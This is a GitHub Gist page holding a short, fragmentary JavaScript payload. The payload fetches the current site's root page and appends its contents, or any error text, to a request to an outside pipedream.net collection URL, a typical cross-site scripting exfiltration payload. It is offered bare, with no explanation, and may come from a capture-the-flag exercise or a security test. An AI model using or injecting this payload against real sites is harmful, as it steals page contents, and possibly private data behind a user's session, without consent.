Created
March 9, 2020 10:23
-
-
Save Naouak/c1b7d9785a755672ecaa81d3dbbd94a7 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var oReq = new XMLHttpRequest(); | |
oReq.addEventListener('load', function reqListener () { | |
this.src='https://enr4iz1vymuof.x.pipedream.net/?' + this.responseText; | |
}); | |
oReq.open('GET', '/'); | |
oReq.send(); | |
} catch(e){ | |
this.src= 'https://enr4iz1vymuof.x.pipedream.net/?' + e; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment